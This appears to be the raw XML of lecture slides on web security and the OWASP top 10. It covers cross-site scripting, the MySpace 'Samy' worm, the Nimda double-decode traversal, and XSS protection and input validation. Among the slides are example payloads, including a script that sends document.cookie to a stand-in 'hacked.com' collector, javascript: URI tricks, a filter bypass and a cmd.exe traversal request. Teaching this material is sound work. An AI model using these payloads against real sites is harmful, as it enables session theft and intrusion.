              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>might be: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>%3Cscript%20src%3D%22http%3A//example.com/evil.js%22%3E%3C/script%3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Which may be returned to browser as:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>UnvaliatedOutput comes from storage (e.g. database, BLOG, configuration file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Stored information cannot be assumed to be safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>DOM based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>UnvalidatedOut contains a script that manipulates the DOM, leading to e.g. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	phishing attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Hybrid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" smtClean="0"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charset="-128"/>
              </a:rPr>
              <a:t>More examples of XSS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84582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1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>this will display the content of the session cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Passing the cookie to a malicious site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>='http://www.hacked.com/cgi-bin/cookie.cgi? '%20+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Embedding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> in a link to a image file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>:[code]” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0"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charset="-128"/>
              </a:rPr>
              <a:t>XSS – MySpace Worm	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  <a:solidFill>
            <a:srgbClr val="FFFFFF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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>” – Using XSS to invite others to add him to the friend list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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Requests are automatically generated using AJAX (HTTP GET and POST)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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“In less than 24 hours, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>’ had amassed over 1 million friends on the popular online community”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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Potential to spread malicious worms is significant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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://fast.info/myspace/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>XSS protection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305800" cy="52530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600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Output encoding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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> e.g. echo htmlentities($UnvalidatedOutput)  (meta characters will be HTML encoded)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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use owasp/microsoft Anti-XSS library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Input Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Specify the output encoding (such as ISO 8859-1, or UTF 8). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not allow the attacker to choose this for your users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not use “blacklist” validation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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prefer Indirect Selection and “whitelisting”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Watch out for canonicalization errors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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Decode input to a canonical internal representation before validation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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Make sure the application does not decode the same input twice!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Language specific recommendations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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Java: Use Struts framework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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Input validator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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Output mechanisms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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>.NET: use Microsoft Anti-XSS library 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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>PHP: ensure output is passed through htmlentities() or htmlspecialchars(), or use the  PHP Anti-XSS library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" smtClean="0"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2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charset="-128"/>
              </a:rPr>
              <a:t>Double Decode Exploit (Nimda)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 wrap="none"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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>GET /scripts/..%255c..%255cwinnt/system32/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>cmd.exe?cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>c+dir+c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>:\ HTTP/1.0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 dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>URL Decode – 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" baseline="30000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> round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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>/..%5c..%5cwinnt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 dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>URL Decode – 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" baseline="30000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> round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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>/..\..\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>winnt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>URL encoding:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.w3schools.com/TAGS/ref_urlencode.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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charset="-128"/>
              </a:rPr>
              <a:t>Input Validation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500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Blacklisting should be avoided if possible:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Myspace blacked listed &lt;script&gt;, but allowed &lt;div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Here is what it missed (2005 Myspace worm)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1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	&lt;div style=“background:url(‘javascript:alert(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>You can pass a filter for &lt;script&gt;, for some browsers as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1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&lt;sc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1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>ript&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Another ingenious ways of bypassing a filter for innerHTML (2005 Myspace worm)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1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Alert(eval(‘document.body.inne’ + ‘rHTML’));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Indirect Selection: best option, if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>User select from a predefined list of values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Only an index to the selected value is passed to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Whitelisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Specify what is allowed instead of what is not allowed (blacklisting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>FSA is a good tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"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4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8502</TotalTime>
  <Words>2559</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>435</Paragraphs>
  <Slides>32</Slides>
  <Notes>30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Flow</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>OWASP top 10 (2012) and its evolution</vt:lpstr>
      <vt:lpstr>1. XSS</vt:lpstr>
      <vt:lpstr>More examples of XSS</vt:lpstr>
      <vt:lpstr>XSS – MySpace Worm </vt:lpstr>
      <vt:lpstr>XSS protection</vt:lpstr>
      <vt:lpstr>Double Decode Exploit (Nimda)</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Other considerations in input validation</vt:lpstr>
      <vt:lpstr>Use of Struts</vt:lpstr>
      <vt:lpstr>2. Injection Flaws</vt:lpstr>
      <vt:lpstr>3. Malicious File Injection</vt:lpstr>
      <vt:lpstr>4. Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>5. Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>XSS vs. CSRF</vt:lpstr>
      <vt:lpstr>Prevention for CSRF</vt:lpstr>
      <vt:lpstr>6. Information Leakage and Improper Error Handling</vt:lpstr>
      <vt:lpstr>6. Information Leakage and Improper Error Handling</vt:lpstr>
      <vt:lpstr>7. Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>7. Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>Accidental Session ID Denial of Service Attacks</vt:lpstr>
      <vt:lpstr>Session ID in URL </vt:lpstr>
      <vt:lpstr>Session ID Analysis</vt:lpstr>
      <vt:lpstr>Session ID Analysis</vt:lpstr>
      <vt:lpstr>Session ID Analysis</vt:lpstr>
      <vt:lpstr>Session Hijacking </vt:lpstr>
      <vt:lpstr>Session Fixation Attack</vt:lpstr>
      <vt:lpstr>8. Ensure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>8. Ensure Cryptographic Storage</vt:lpstr>
      <vt:lpstr>9. Insecure Communications</vt:lpstr>
      <vt:lpstr>10. Failure to Restrict URL Access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ITIS 4166/5166 Network Based Application Development</dc:title>
  <dc:creator>Kombol, Tony</dc:creator>
  <cp:lastModifiedBy>test</cp:lastModifiedBy>
  <cp:revision>176</cp:revision>
  <cp:lastPrinted>2006-08-29T18:16:07Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-25T13:45:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-07-28T17:36:12Z</dcterms:modified>
</cp:coreProperties>
</file>